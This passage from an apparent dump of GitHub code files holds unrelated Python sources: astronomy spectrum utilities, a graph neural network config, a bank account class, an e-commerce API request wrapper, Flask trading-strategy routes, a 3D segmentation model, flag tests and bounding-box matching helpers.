Parameters\n ----------\n freq : numpy.array\n Frequency data.\n flux : numpy.array\n Flux data.\n brightness_temp : numpy.array\n Brightness temperature data.\n\n Returns\n -------\n w : numpy.array\n Wavelength of each data point.\n f : numpy.array\n Flux at each wavelength in `w`.\n t : numpy.array\n Brightness temperature at each wavelength in `w`.\n\n \"\"\"\n # Speed of light in microns/sec\n clight = 2.9979e14\n wave = clight / (freq * 1e9)\n\n # Sort the data by wavelength\n sortind = np.argsort(wave)\n w = wave[sortind]\n f = flux[sortind]\n t = brightness_temp[sortind]\n\n return w, f, t\n\n\ndef plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile):\n \"\"\"\n Plot the scaled Herschel model.\n\n Parameters\n ----------\n wave : numpy.array\n Wavelength data of spectrum.\n scaled_flux : numpy.array\n Flux data of spectrum.\n scale_factor : numpy.array\n Scale factor applied to Herschel model.\n infile : str\n Name of Herschel model.\n\n Returns\n -------\n None\n\n \"\"\"\n from matplotlib.backends.backend_agg \\\n import FigureCanvasAgg as FigureCanvas\n from matplotlib.figure import Figure\n\n fig = Figure(figsize=(10, 10))\n FigureCanvas(fig)\n ax = fig.add_subplot(1, 1, 1)\n\n ax.plot(wave, scaled_flux)\n ax.set_xlim([30, 300])\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlabel('Wavelength (microns)')\n ax.set_ylabel('Flux (Jy)')\n ax.set_title(f'Scale = {scale_factor:.3f}')\n fig.savefig(f'scaled_flux_{os.path.basename(infile).split(\".\")[0]}.png',\n bbox_inches='tight')\n\n\ndef write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile):\n \"\"\"\n Write the scaled Herschel model to file.\n\n Parameters\n ----------\n wave : numpy.array\n Wavelength data of spectrum.\n scaled_flux : numpy.array\n Flux data of spectrum.\n scale_factor : float\n Scale factor applied to Herschel model.\n temp : numpy.array\n Brightness temperature data of spectrum.\n infile : str\n Name of Herschel file.\n outfile : str\n Name of file to create with scaled spectrum.\n\n Returns\n -------\n None\n\n \"\"\"\n with open(outfile, 'w') as outf:\n outf.write('; {0:s}\\n'.format(infile))\n outf.write('; FSCALE = {}\\n'.format(scale_factor))\n outf.write('; Wave (microns) Flux (Jy) T_br (K) '\n ' Fscale = {0:.3f}\\n'.format(scale_factor))\n\n for i in range(len(wave)):\n outf.write(f'{wave[i]:.6f}\\t{scaled_flux[i]:.6f}\\t{temp[i]:.6f}\\n')\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/calibration/standard_model/modconvert.py","file_name":"modconvert.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"35242886255","text":"from yacs.config import CfgNode as CN\n\ndef set_cfg(cfg):\n\n # ------------------------------------------------------------------------ #\n # Basic options\n # ------------------------------------------------------------------------ #\n # Dataset name\n cfg.dataset = 'ZINC'\n # Additional num of worker for data loading\n cfg.num_workers = 12\n # Cuda device number, used for machine with multiple gpus\n cfg.device = 0 \n # Additional string add to logging \n cfg.handtune = ''\n # Whether fix the running seed to remove randomness\n cfg.seed = None\n # version \n cfg.version = 'final'\n # task, for simulation datasets\n cfg.task = -1\n # amp \n cfg.amp = False\n\n # ------------------------------------------------------------------------ #\n # Training options\n # 
------------------------------------------------------------------------ #\n cfg.train = CN()\n # Total graph mini-batch size\n cfg.train.batch_size = 100\n # Maximal number of epochs\n cfg.train.epochs = 100\n # Number of runs with random init \n cfg.train.runs = 3\n # Base learning rate\n cfg.train.lr = 0.001\n # number of steps before reduce learning rate\n cfg.train.lr_patience = 50\n # learning rate decay factor\n cfg.train.lr_decay = 0.5\n # L2 regularization, weight decay\n cfg.train.wd = 0.\n # Dropout rate\n cfg.train.dropout = 0.\n \n # ------------------------------------------------------------------------ #\n # Model options\n # ------------------------------------------------------------------------ #\n cfg.model = CN()\n cfg.model.arch_type = 'KCSetGNN' # ['SubgraphGNN', 'KCSetGNN', 'PPGN', 'GNN']\n cfg.model.gnn_type = 'GINEConv' # GNN type used, see core.model_utils.pyg_gnn_wrapper for all options\n cfg.model.bgnn_type = 'Sequential' # [main param] bipartite gnn propagation type, Sequential or Parallel\n \n cfg.model.hidden_size = 128 # hidden size of the model\n cfg.model.num_layers = 4 # [main param] number of bipartite message passing layers\n cfg.model.num_inners = 2 # [main param] number of base model layers\n cfg.model.pools = ['add'] # multiple different aggregations, will be used by SetGNN to stablize training\n cfg.model.half_step = False # always be set to False\n\n # ------------------------------------------------------------------------ #\n # Subgraph options\n # ------------------------------------------------------------------------ #\n cfg.subgraph = CN()\n cfg.subgraph.type = 'kWL' # ['kWL', 'cluster', 'ego']\n cfg.subgraph.kmax = 3 # [main param] parameter k in the paper\n cfg.subgraph.kmin = 0 # current implementation doesn't support values other than 0 \n cfg.subgraph.stack = True # use (k,c) set or (k,c)(<=) set. Set to True will include sets with smaller size than kmax. 
\n    cfg.subgraph.num_components = 1 # [main param] parameter c in the paper\n    cfg.subgraph.zero_init = True # whether init multiple-components sets with 0\n\n    return cfg\n    \nimport os \nimport argparse\n# Principle means that if an option is defined in a YACS config object, \n# then your program should set that configuration option using cfg.merge_from_list(opts) and not by defining, \n# for example, --train-scales as a command line argument that is then used to set cfg.TRAIN.SCALES.\n\ndef update_cfg(cfg, args_str=None):\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--config', default=\"\", metavar=\"FILE\", help=\"Path to config file\")\n    # opts arg needs to match set_cfg\n    parser.add_argument(\"opts\", default=[], nargs=argparse.REMAINDER, \n                        help=\"Modify config options using the command-line\")\n\n    if isinstance(args_str, str):\n        # parse from a string\n        args = parser.parse_args(args_str.split())\n    else:\n        # parse from command line\n        args = parser.parse_args()\n    # Clone the original cfg \n    cfg = cfg.clone()\n    \n    # Update from config file\n    if os.path.isfile(args.config):\n        cfg.merge_from_file(args.config)\n\n    # Update from command line \n    cfg.merge_from_list(args.opts)\n    \n    return cfg\n\n\"\"\"\n    Global variable\n\"\"\"\ncfg = set_cfg(CN())","repo_name":"LingxiaoShawn/KCSetGNN","sub_path":"core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"71338976550","text":"import itertools\nimport numbers\nfrom datetime import timedelta, datetime\nfrom collections import namedtuple\n\n\nConfirmation = namedtuple('Confirmation', 'account_number, transaction_code, transaction_id, time_utc, time')\n\n\nclass TimeZone:\n    def __init__(self, name, offset_hours, offset_minutes):\n        if name is None or len(str(name).strip()) == 0:\n            raise ValueError('Timezone name cannot be empty.')\n\n        self._name = str(name).strip()\n        # technically we should check that offset is an integer\n        if not isinstance(offset_hours, numbers.Integral):\n            raise ValueError('Hour offset must be an integer.')\n\n        if not isinstance(offset_minutes, numbers.Integral):\n            raise ValueError('Minutes offset must be an integer.')\n\n        if offset_minutes < -59 or offset_minutes > 59:\n            raise ValueError('Minutes offset must be between -59 and 59 (inclusive).')\n\n        # for time delta sign of minutes will be set to sign of hours\n        offset = timedelta(hours=offset_hours, minutes=offset_minutes)\n\n        # offsets are technically bounded between -12:00 and 14:00\n        # see: https://en.wikipedia.org/wiki/List_of_UTC_time_offsets\n        if offset < timedelta(hours=-12, minutes=0) or offset > timedelta(hours=14, minutes=0):\n            raise ValueError('Offset must be between -12:00 and +14:00.')\n\n        self._offset_hours = offset_hours\n        self._offset_minutes = offset_minutes\n        self._offset = offset\n\n    @property\n    def offset(self):\n        return self._offset\n\n    @property\n    def name(self):\n        return self._name\n\n    def __eq__(self, other):\n        return (isinstance(other, TimeZone) and\n                self.name == other.name and\n                self._offset_hours == other._offset_hours and\n                self._offset_minutes == other._offset_minutes)\n\n    def __repr__(self):\n        return (f\"TimeZone(name='{self.name}', \"\n                f\"offset_hours={self._offset_hours}, \"\n                f\"offset_minutes={self._offset_minutes})\")\n\n\nclass Account:\n    transaction_counter = itertools.count(100)\n    _interest_rate = 0.5\n\n    _transaction_codes = {\n        'deposit': 'D',\n        'withdraw': 'W',\n        'interest': 'I',\n        'rejected': 'X'\n    }\n\n    
def __init__(self, account_number, first_name, last_name, timezone=None, initial_balance=0):\n        self._account_number = account_number\n        self.first_name = first_name\n        self.last_name = last_name\n\n        if timezone is None:\n            timezone = TimeZone('UTC', 0, 0)\n        self.timezone = timezone\n        self._balance = Account.validate_real_number(initial_balance, min_value=0) # Static Method\n\n    @property\n    def account_number(self):\n        return self._account_number\n\n    @property\n    def first_name(self):\n        return self._first_name\n\n    @first_name.setter\n    def first_name(self, value):\n        self.validate_and_set_name('_first_name', value, 'First Name')\n\n    @property\n    def last_name(self):\n        return self._last_name\n\n    @last_name.setter\n    def last_name(self, value):\n        self.validate_and_set_name('_last_name', value, 'Last Name')\n\n    @property\n    def full_name(self):\n        return f'{self.first_name} {self.last_name}'\n\n    @property\n    def timezone(self):\n        return self._timezone\n\n    @property\n    def balance(self):\n        return self._balance\n\n    @timezone.setter\n    def timezone(self, value):\n        if not isinstance(value, TimeZone):\n            raise ValueError('Time Zone must be a valid TimeZone object.')\n        self._timezone = value\n\n    @classmethod\n    def get_interest_rate(cls):\n        return cls._interest_rate\n\n    @classmethod\n    def set_interest_rate(cls, value):\n        if not isinstance(value, numbers.Real):\n            raise ValueError('Interest must be a real number.')\n        if value < 0:\n            raise ValueError('Interest rate cannot be negative.')\n        cls._interest_rate = value\n\n    def validate_and_set_name(self, property_name: str, value: str, field_title: str):\n        if value is None or len(str(value).strip()) == 0:\n            raise ValueError(f'{field_title} cannot be empty.')\n        setattr(self, property_name, value)\n\n    @staticmethod\n    def validate_real_number(value, min_value=None):\n        if not isinstance(value, numbers.Real):\n            raise ValueError('Value must be a real number.')\n        if min_value is not None and value < min_value:\n            raise ValueError(f'Value must be at least {min_value}')\n        return value\n\n    def generate_confirmation_code(self, transaction_code):\n        # code must stay on a single line so parse_confirmation_code can split it on '-'\n        dt_str = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n        return f'{transaction_code}-{self._account_number}-{dt_str}-{next(Account.transaction_counter)}'\n\n    @staticmethod\n    def parse_confirmation_code(confirmation_code, preferred_time_zone=None):\n        parts = confirmation_code.split('-')\n        if len(parts) != 4:\n            raise ValueError('Invalid confirmation code!!!')\n\n        transaction_code, account_number, raw_dt_utc, transaction_id = parts\n\n        try:\n            dt_utc = datetime.strptime(raw_dt_utc, '%Y%m%d%H%M%S')\n        except ValueError as ex:\n            raise ValueError('Invalid transaction datetime') from ex\n\n        if preferred_time_zone is None:\n            preferred_time_zone = TimeZone('UTC', 0, 0)\n        if not isinstance(preferred_time_zone, TimeZone):\n            raise ValueError('Invalid TimeZone Specified')\n\n        dt_preferred = dt_utc + preferred_time_zone.offset\n        dt_preferred_str = f\"{dt_preferred.strftime('%Y-%m-%d %H:%M:%S')} ({preferred_time_zone.name})\"\n        return Confirmation(account_number, transaction_code,\n                            transaction_id, dt_utc.isoformat(), dt_preferred_str)\n\n    def deposit(self, value):\n        if not isinstance(value, numbers.Real):\n            raise ValueError('Deposit value must be a real number.')\n        if value <= 0:\n            raise ValueError('Deposit value must be a positive number.')\n\n        transaction_code = Account._transaction_codes['deposit'] # Class Property\n        conf_code = self.generate_confirmation_code(transaction_code)\n        self._balance += value\n        return conf_code\n\n    def withdraw(self, 
value):\n        # validate first, otherwise a negative value would slip past the\n        # balance check below and actually increase the balance\n        value = Account.validate_real_number(value, min_value=0.01)\n        accepted = False\n        if self.balance - value < 0:\n            transaction_code = Account._transaction_codes['rejected']\n        else:\n            transaction_code = Account._transaction_codes['withdraw']\n            accepted = True\n\n        conf_code = self.generate_confirmation_code(transaction_code)\n        if accepted:\n            self._balance -= value\n        return conf_code\n\n    def pay_interest(self):\n        interest = self.balance * Account.get_interest_rate() / 100\n        conf_code = self.generate_confirmation_code(self._transaction_codes['interest'])\n        self._balance += interest\n        return conf_code\n\n\na = Account('A100', 'Eric', 'Idle', initial_balance=100)\n\n# try:\n#     a.deposit(-100)\n# except ValueError as ex:\n#     print(ex)\n#\n# try:\n#     a.withdraw(\"100\")\n# except ValueError as ex:\n#     print(ex)\n","repo_name":"Koubae/Programming-CookBook","sub_path":"Programming Languages/Python/Basics/Part -4- OOP/Proj_1/bank_account2.py","file_name":"bank_account2.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"71"}
{"seq_id":"10998572615","text":"from typing import List\nfrom topsdk.client import BaseRequest\nfrom topsdk.util import convert_struct_list,convert_basic_list,convert_struct,convert_basic\nfrom datetime import datetime\n\n\nclass AlibabaItemPublishSchemaGetRequest(BaseRequest):\n\n    def __init__(\n        self,\n        images: list = None,\n        item_type: str = None,\n        biz_type: str = None,\n        market: str = None,\n        cat_id: int = None,\n        spu_id: int = None,\n        barcode: str = None\n    ):\n        \"\"\"\n        Main item image links, at most 5, passed as complete URLs\n        \"\"\"\n        self._images = images\n        \"\"\"\n        Item type. b: fixed price, a: auction. Defaults to b (fixed price)\n        \"\"\"\n        self._item_type = item_type\n        \"\"\"\n        Business extension parameter, to be agreed with the platform in advance\n        \"\"\"\n        self._biz_type = biz_type\n        \"\"\"\n        Market the item is published to. taobao: Taobao, tmall: Tmall, litetao: Taobao Deals\n        \"\"\"\n        self._market = market\n        \"\"\"\n        Item category ID\n        \"\"\"\n        self._cat_id = cat_id\n        \"\"\"\n        Product (SPU) ID, required for the Tmall market (market=tmall)\n        \"\"\"\n        self._spu_id = spu_id\n        \"\"\"\n        Item barcode\n        \"\"\"\n        self._barcode = barcode\n\n    @property\n    def images(self):\n        return self._images\n\n    @images.setter\n    def images(self, images):\n        if isinstance(images, list):\n            self._images = images\n        else:\n            raise TypeError(\"images must be list\")\n\n    @property\n    def item_type(self):\n        return self._item_type\n\n    @item_type.setter\n    def item_type(self, item_type):\n        if isinstance(item_type, str):\n            self._item_type = item_type\n        else:\n            raise TypeError(\"item_type must be str\")\n\n    @property\n    def biz_type(self):\n        return self._biz_type\n\n    @biz_type.setter\n    def biz_type(self, biz_type):\n        if isinstance(biz_type, str):\n            self._biz_type = biz_type\n        else:\n            raise TypeError(\"biz_type must be str\")\n\n    @property\n    def market(self):\n        return self._market\n\n    @market.setter\n    def market(self, market):\n        if isinstance(market, str):\n            self._market = market\n        else:\n            raise TypeError(\"market must be str\")\n\n    @property\n    def cat_id(self):\n        return self._cat_id\n\n    @cat_id.setter\n    def cat_id(self, cat_id):\n        if isinstance(cat_id, int):\n            self._cat_id = cat_id\n        else:\n            raise TypeError(\"cat_id must be int\")\n\n    @property\n    def spu_id(self):\n        return self._spu_id\n\n    @spu_id.setter\n    def spu_id(self, spu_id):\n        if isinstance(spu_id, int):\n            self._spu_id = spu_id\n        else:\n            raise TypeError(\"spu_id must be int\")\n\n    @property\n    def barcode(self):\n        return self._barcode\n\n    @barcode.setter\n    def barcode(self, barcode):\n        if isinstance(barcode, str):\n            self._barcode = barcode\n        else:\n            raise TypeError(\"barcode must be str\")
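\n\n    # Example (sketch, hypothetical IDs): build a request and inspect the\n    # wire form produced by to_dict() below.\n    #     req = AlibabaItemPublishSchemaGetRequest(cat_id=50012345, market='taobao')\n    #     req.to_dict()   # {'market': 'taobao', 'cat_id': 50012345}\n\n    def get_api_name(self):\n        return 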
\"alibaba.item.publish.schema.get\"\n\n def to_dict(self):\n request_dict = {}\n if self._images is not None:\n request_dict[\"images\"] = convert_basic_list(self._images)\n\n if self._item_type is not None:\n request_dict[\"item_type\"] = convert_basic(self._item_type)\n\n if self._biz_type is not None:\n request_dict[\"biz_type\"] = convert_basic(self._biz_type)\n\n if self._market is not None:\n request_dict[\"market\"] = convert_basic(self._market)\n\n if self._cat_id is not None:\n request_dict[\"cat_id\"] = convert_basic(self._cat_id)\n\n if self._spu_id is not None:\n request_dict[\"spu_id\"] = convert_basic(self._spu_id)\n\n if self._barcode is not None:\n request_dict[\"barcode\"] = convert_basic(self._barcode)\n\n return request_dict\n\n def get_file_param_dict(self):\n file_param_dict = {}\n return file_param_dict\n\n","repo_name":"LIANGCYRUS/TopApiSite","sub_path":"apps/topsdk/defaultability/request/alibaba_item_publish_schema_get_request.py","file_name":"alibaba_item_publish_schema_get_request.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10880032391","text":"from flask import Flask, request\nfrom app import App\n\nclass Routes():\n flask_app = Flask(__name__)\n application = App()\n \n ################Strategy#######################\n\n # route to add a strategy (with parameters)\n @flask_app.route(\"/add_simple\", methods=['POST'])\n def add_strategy_simple():\n try:\n name = request.form['name']\n ticker = request.form['ticker']\n interval = float(request.form['interval'])\n qty = float(request.form['qty'])\n except Exception as e:\n return str(e), 400\n\n # add the strategy to app\n return app.application.add_strategy_simple(name, ticker, interval, qty)\n \n # route to add a strategy (with parameters)\n @flask_app.route(\"/add_rnn\", methods=['POST'])\n def add_strategy_rnn():\n try:\n name = request.form['name']\n ticker = request.form['ticker']\n interval = float(request.form['interval'])\n qty = float(request.form['qty'])\n\n \n default = True if request.form['default'] == \"True\" else False\n if not default:\n units = int(request.form['units'])\n epoch = int(request.form['epoch'])\n\n return app.application.add_strategy_RNN(name, ticker, interval, qty, default, units=units, epoch=epoch)\n except Exception as e:\n return str(e), 400\n\n # add the strategy to app\n return app.application.add_strategy_RNN(name, ticker, interval, qty, default)\n \n ###############################################\n\n # List all the strategies on the app\n @flask_app.route(\"/list_strategy\", methods=['GET'])\n def list_strategy():\n return app.application.list_strategy()\n \n # List all workers on the app\n @flask_app.route(\"/list_worker\", methods=['GET'])\n def list_worker():\n return app.application.list_worker()\n \n # Execute a estrategy\n @flask_app.route(\"/exec\", methods=['POST'])\n def exec_strategy():\n strategy_name = request.form['strategy_name']\n worker_name = request.form['worker_name']\n return app.application.exec_strategy(strategy_name, worker_name)\n \n # Info of a strategy\n @flask_app.route(\"/strategy_info\", methods=['POST'])\n def info_strategy():\n worker_name = request.form['name']\n return app.application.info_strategy(worker_name)\n \n # Stop a strategy\n @flask_app.route(\"/stop\", methods=['POST'])\n def stop_worker_strategy():\n worker_name = request.form['name']\n return app.application.stop_worker_strategy(worker_name)\n \n # Stop a strategy\n 
@flask_app.route(\"/start\", methods=['POST'])\n def start_worker_strategy():\n worker_name = request.form['name']\n return app.application.start_worker_strategy(worker_name)\n \n # Worker status\n @flask_app.route(\"/is_active\", methods=['POST'])\n def status_worker_strategy():\n worker_name = request.form['name']\n return app.application.is_active_worker_strategy(worker_name)\n\n # Delete a strategy\n @flask_app.route(\"/delete_strategy\", methods=['POST'])\n def delete_strategy():\n strategy_name = request.form['name']\n return app.application.delete_strategy(strategy_name)\n \n # Delete a worker\n @flask_app.route(\"/delete_worker\", methods=['POST'])\n def delete_worker_strategy():\n worker_name = request.form['name']\n return app.application.delete_worker(worker_name)\n\n # Stats of a worker\n @flask_app.route(\"/stats_worker\", methods=['POST'])\n def stats_worker_strategy():\n worker_name = request.form['name']\n return app.application.stats_worker(worker_name)\n\n\nif __name__ == '__main__':\n app = Routes()\n app.flask_app.run(host=\"0.0.0.0\", debug=True, use_debugger=False, use_reloader=False)","repo_name":"jaimex200/Herramienta-de-Inversion-Algoritmica","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40304793662","text":"import os\nimport logging\nimport numpy as np\nfrom configargparse import ArgumentParser\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport torch\nfrom pathlib import Path\nimport tempfile\nimport pytorch_lightning as pl\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch \nimport time\nimport matplotlib.pyplot as plt\nfrom midasmednet.unet.model import ResidualUNet3D\nfrom midasmednet.unet.loss import DiceLoss, WeightedCrossEntropyLoss, dice_metric\nfrom midasmednet.unet.loss import expand_as_one_hot\nfrom midasmednet.utils.plots import vis_logimages, vis_loglabels\nfrom torchvision.utils import make_grid\n\nclass SegmentationNet(ResidualUNet3D):\n\n def __init__(self,\n hparams,\n training_dataset=None,\n validation_dataset=None):\n\n # create model\n super(SegmentationNet, self).__init__(hparams.in_channels, hparams.out_channels,\n final_sigmoid=False, f_maps= hparams.fmaps)\n # copy over\n self.hparams = hparams\n self.training_dataset = training_dataset\n self.validation_dataset = validation_dataset\n self.learning_rate = hparams.learning_rate\n self.num_workers = hparams.num_workers\n self.batch_size = hparams.batch_size\n self.out_channels = hparams.out_channels\n self.in_channels = hparams.in_channels\n\n # set loss criterion\n if hasattr(hparams, 'loss'):\n assert hparams.loss in ['DICE', 'CE']\n loss_weight = torch.tensor(hparams.loss_weight)\n if hparams.loss == 'DICE':\n self.loss = DiceLoss(weight=loss_weight)\n elif hparams.loss == 'CE':\n self.loss = torch.nn.CrossEntropyLoss(weight=loss_weight)\n\n # optional\n self.log_interval = hparams.log_interval if hasattr(hparams, 'log_interval') else 5\n self.log_vis_mip = hparams.log_vis_mip if hasattr(hparams, 'log_vis_mip') else 'mean'\n \n # initialization\n self.logger = logging.getLogger(__name__)\n\n def training_step(self, batch, batch_nb):\n inputs = batch['data'].float()\n labels = batch['label'][:, -1, ...].long()\n # output of the network is assumed to be un-normalized\n outputs = self(inputs)\n loss = self.loss(outputs, labels)\n tensorboard_logs = {\"train_loss\": loss.item()}\n 
return {'loss': loss, 'log': tensorboard_logs}\n\n def log_samples(self, batch, outputs, batch_id):\n # extract data\n inputs = batch['data'].float().cpu().numpy()\n labels = batch['label'][:, -1, ...].long().cpu().numpy()\n prediction = F.softmax(outputs, dim=1)\n pred_class = torch.argmax(prediction, dim=1).cpu().numpy()\n\n with tempfile.TemporaryDirectory() as test:\n png_path = str(Path(test)/'tmp.png')\n\n # images\n fig, ax = vis_logimages(inputs[0, ...])\n plt.title(f\"epoch {self.current_epoch} batch {batch_id}\")\n plt.savefig(png_path, bbox_inches='tight',pad_inches = 0, dpi = 200) \n plt.close(fig)\n self.logger[1].experiment.log_image('images', png_path)\n\n # labels\n fig, ax = vis_loglabels(labels[0, ...], pred_class[0, ...],\n inputs=inputs[0, 0, ...],\n projection_type=self.log_vis_mip)\n plt.title(f\"epoch {self.current_epoch} batch {batch_id}\")\n plt.savefig(png_path, bbox_inches='tight',pad_inches = 0, dpi = 200) \n plt.close(fig)\n self.logger[1].experiment.log_image('labels', png_path)\n return\n\n def validation_step(self, batch, batch_nb):\n inputs = batch['data'].float()\n labels = batch['label'][:, -1, ...].long()\n # output of the network is assumed to be un-normalized\n outputs = self(inputs)\n # log samples \n if batch_nb%self.log_interval == 0:\n self.log_samples(batch, outputs, batch_id=batch_nb)\n # metrics\n loss = self.loss(outputs, labels)\n per_channel_dice = dice_metric(outputs, labels)\n # store results to dictionary\n results = {'val_loss': loss}\n for c in range(self.out_channels):\n results[f'val_dice{c}'] = per_channel_dice[c]\n return results\n\n def validation_epoch_end(self, outputs):\n # average metrics over epoch\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n logs = {\"val_loss\": avg_loss}\n for c in range(self.out_channels):\n logs[f\"val_dice{c}\"] = torch.stack([x[f\"val_dice{c}\"] for x in outputs]).mean()\n return {\"val_loss\": avg_loss, \"log\": logs, \"progress_bar\": logs}\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n\n def train_dataloader(self):\n return DataLoader(self.training_dataset, \n batch_size=self.batch_size, \n num_workers=self.num_workers,\n shuffle=True)\n\n def val_dataloader(self):\n return DataLoader(self.validation_dataset, \n batch_size=self.batch_size, \n num_workers=self.num_workers,\n shuffle=False)","repo_name":"tobiashepp/torch-mednet","sub_path":"midasmednet/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"86284874712","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport numpy as np\nimport pytest\n\nfrom sofia_redux.scan.flags.motion_flags import MotionFlags\nfrom sofia_redux.scan.coordinate_systems.coordinate_2d import Coordinate2D\n\n\ndef test_motion_flags():\n flags = MotionFlags\n all_letters = 'xyzijkXYZMntscp'\n for letter in all_letters:\n assert flags.flag_to_letter(flags.letter_to_flag(letter)) == letter\n\n\ndef test_convert_flag():\n flags = MotionFlags\n f = flags.flags\n assert flags.convert_flag(f.NORM) == f.NORM\n assert flags.convert_flag(2) == f.Y\n assert flags.convert_flag('norm') == f.NORM\n assert flags.convert_flag('|x|') == f.X_MAGNITUDE\n assert flags.convert_flag('x^2') == f.X2\n assert flags.convert_flag('mag') == f.MAGNITUDE\n assert flags.convert_flag('nor') == f.NORM\n with pytest.raises(ValueError) as err:\n _ = 
flags.convert_flag('foo')\n    assert 'Unknown flag' in str(err.value)\n    with pytest.raises(ValueError) as err:\n        _ = flags.convert_flag(1.0)\n    assert \"Invalid flag type\" in str(err.value)\n\n\ndef test_init():\n    c = Coordinate2D(np.arange(10).reshape((2, 5)))\n    flags = MotionFlags('x')\n    f = flags.flags\n    assert flags.direction == f.X\n    assert np.allclose(flags(c), np.arange(5))\n    flags = MotionFlags('CHOPPER')\n    assert np.all(np.isnan(flags(c)))\n\n\ndef test_get_value():\n    c = Coordinate2D(np.arange(10).reshape((2, 5)) - 3)\n    f = MotionFlags('y')\n    assert np.allclose(f.get_value(c), [2, 3, 4, 5, 6])\n    f = MotionFlags('x')\n    assert np.allclose(f.get_value(c), [-3, -2, -1, 0, 1])\n    f = MotionFlags('|x|')\n    assert np.allclose(f.get_value(c), [3, 2, 1, 0, 1])\n    f = MotionFlags('y^2')\n    assert np.allclose(f.get_value(c), [4, 9, 16, 25, 36])\n    f = MotionFlags('mag')\n    assert np.allclose(f.get_value(c), [3.6055, 3.6055, 4.1231, 5, 6.0827],\n                       atol=1e-3)\n    f = MotionFlags('norm')\n    assert np.allclose(f.get_value(c), [3.6055, 3.6055, 4.1231, 5, 6.0827],\n                       atol=1e-3)\n\n\ndef test_call():\n    c = Coordinate2D(np.arange(10).reshape((2, 5)))\n    f = MotionFlags('x')\n    assert np.allclose(f(c), [0, 1, 2, 3, 4])\n\n\ndef test_str():\n    f = MotionFlags('norm')\n    assert str(f) == 'MotionFlags: MotionFlagTypes.NORM'\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/flags/tests/test_motion_flags.py","file_name":"test_motion_flags.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
{"seq_id":"12872625584","text":"from skimage.metrics import structural_similarity as compare_ssim\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport cv2\n\nclass bb_utils():\n\n    def bb_intersection_over_union(self, boxA, boxB):\n        '''return the intersection over union value'''\n\n        xA = max(boxA[0], boxB[0])\n        yA = max(boxA[1], boxB[1])\n        xB = min(boxA[2], boxB[2])\n        yB = min(boxA[3], boxB[3])\n\n        interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n        boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n        boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n        iou = interArea / float(boxAArea + boxBArea - interArea)\n        return iou\n\n    def associate_bounding_boxes(self, bbox_1, bbox_2):\n        '''\n        bbox_1: bounding boxes from image 1\n        bbox_2: bounding boxes from image 2\n        Define a Hungarian matrix with IOU as a metric and return,\n        for each box, a corresponding id if a match is found\n        '''\n        # Define a new IOU Matrix nxm with input boxes\n        iou_matrix = np.zeros((len(bbox_1), len(bbox_2)), dtype=np.float32)\n\n        # Go through boxes and store the IOU value for each box\n        for i, box_1 in enumerate(bbox_1):\n            for j, box_2 in enumerate(bbox_2):\n                iou_matrix[i][j] = self.bb_intersection_over_union(box_1, box_2)\n\n        # Call for the Hungarian Algorithm\n        h_row, h_col = linear_sum_assignment(-iou_matrix)\n        h_matrix = np.array(list(zip(h_row, h_col)))\n\n        # Create new unmatched lists for old and new boxes\n        matches = []\n\n        # Go through the Hungarian Matrix,\n        # if a matched element has IOU > threshold (0.4),\n        # add it to the matched list\n        for h in h_matrix:\n            if(iou_matrix[h[0], h[1]] > 0.4):\n                matches.append(h.reshape(1, 2))\n\n        if(len(matches) == 0):\n            matches = np.empty((0, 2), dtype=int)\n        else:\n            matches = np.concatenate(matches, axis=0)\n        return matches
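\n\n    # Example (sketch): two nearly identical boxes match, the outlier does not.\n    #     bb = bb_utils()\n    #     bb.associate_bounding_boxes([[0, 0, 10, 10], [50, 50, 60, 60]],\n    #                                 [[1, 1, 11, 11]])\n    #     # -> array([[0, 0]])  (box 0 of set 1 paired with box 0 of set 2,\n    #     #    IOU ~= 0.70 > 0.4; the box at [50, 50, 60, 60] has IOU 0)\n\n    def get_bb_img(self, img, box):\n        ''' return image array with bounding box dimensions'''\n\n        shp = img.shape\n        x1 = int(box[0] * shp[1] - 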
